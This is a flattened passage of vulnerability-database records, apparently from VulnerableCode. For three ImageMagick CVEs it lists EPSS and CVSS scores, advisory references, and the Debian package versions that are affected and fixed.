value	0.00477
scoring_system	epss
scoring_elements	0.64857
published_at	2026-04-07T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64907
published_at	2026-04-08T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64921
published_at	2026-04-09T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64939
published_at	2026-04-11T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64929
published_at	2026-04-12T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64901
published_at	2026-04-13T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64937
published_at	2026-04-16T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64948
published_at	2026-04-18T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64932
published_at	2026-04-21T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64952
published_at	2026-04-24T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64964
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2016-8866

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.1
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:C

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1388816
reference_id	1388816
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1388816

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2016-8866

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qye1-pv1p-8fbp

url VCID-ra5y-ag3h-5yb8

vulnerability_id VCID-ra5y-ag3h-5yb8

summary

Multiple vulnerabilities have been found in ImageMagick, the worst
    of which may allow remote attackers to cause a Denial of Service condition.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-14248.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-14248.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-14248

reference_id

reference_type

scores

value	0.00281
scoring_system	epss
scoring_elements	0.51427
published_at	2026-04-01T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51512
published_at	2026-04-24T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51527
published_at	2026-04-13T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.5157
published_at	2026-04-16T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51579
published_at	2026-04-18T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51558
published_at	2026-04-21T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51478
published_at	2026-04-02T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51505
published_at	2026-04-04T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51465
published_at	2026-04-07T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51518
published_at	2026-04-26T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51516
published_at	2026-04-09T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.5156
published_at	2026-04-11T12:55:00Z

value	0.00281
scoring_system	epss
scoring_elements	0.51539
published_at	2026-04-12T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-14248

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5
scoring_system	cvssv2
scoring_elements	AV:N/AC:L/Au:N/C:N/I:N/A:P

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick/issues/717
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/issues/717

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1491254
reference_id	1491254
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1491254

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.6-8:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:7.0.6-8:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.6-8:::::::*

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2017-14248

reference_id

CVE-2017-14248

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2017-14248

reference_url	https://security.gentoo.org/glsa/201711-07
reference_id	GLSA-201711-07
reference_type
scores
url	https://security.gentoo.org/glsa/201711-07

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-14248

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ra5y-ag3h-5yb8

url VCID-rghj-fgdd-nke7

vulnerability_id VCID-rghj-fgdd-nke7

summary ImageMagick: heap-based buffer overflow in ReadTIM2ImageData() function in coders/tim2.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34474.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34474.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-34474

reference_id

reference_type

scores

value	0.00028
scoring_system	epss
scoring_elements	0.08033
published_at	2026-04-08T12:55:00Z

value	0.00028
scoring_system	epss
scoring_elements	0.07968
published_at	2026-04-02T12:55:00Z

value	0.00028
scoring_system	epss
scoring_elements	0.08014
published_at	2026-04-04T12:55:00Z

value	0.00028
scoring_system	epss
scoring_elements	0.07973
published_at	2026-04-07T12:55:00Z

value	0.00028
scoring_system	epss
scoring_elements	0.08051
published_at	2026-04-09T12:55:00Z

value	0.00028
scoring_system	epss
scoring_elements	0.08035
published_at	2026-04-11T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10195
published_at	2026-04-18T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10328
published_at	2026-04-21T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10309
published_at	2026-04-24T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10302
published_at	2026-04-26T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10372
published_at	2026-04-12T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.1035
published_at	2026-04-13T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10224
published_at	2026-04-16T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-34474

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/ImageMagick/ImageMagick/commit/1061db7f80fdc9ef572ac60b55f408f7bab6e1b0

reference_id

1061db7f80fdc9ef572ac60b55f408f7bab6e1b0

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T19:42:10Z/

url

https://github.com/ImageMagick/ImageMagick/commit/1061db7f80fdc9ef572ac60b55f408f7bab6e1b0

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2214148

reference_id

2214148

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T19:42:10Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2214148

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_id

45DUUXYMAEEAW55GSLAXN25VPKCRAIDA

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T19:42:10Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_id

4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T19:42:10Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_url

https://access.redhat.com/security/cve/CVE-2023-34474

reference_id

CVE-2023-34474

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T19:42:10Z/

url

https://access.redhat.com/security/cve/CVE-2023-34474

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

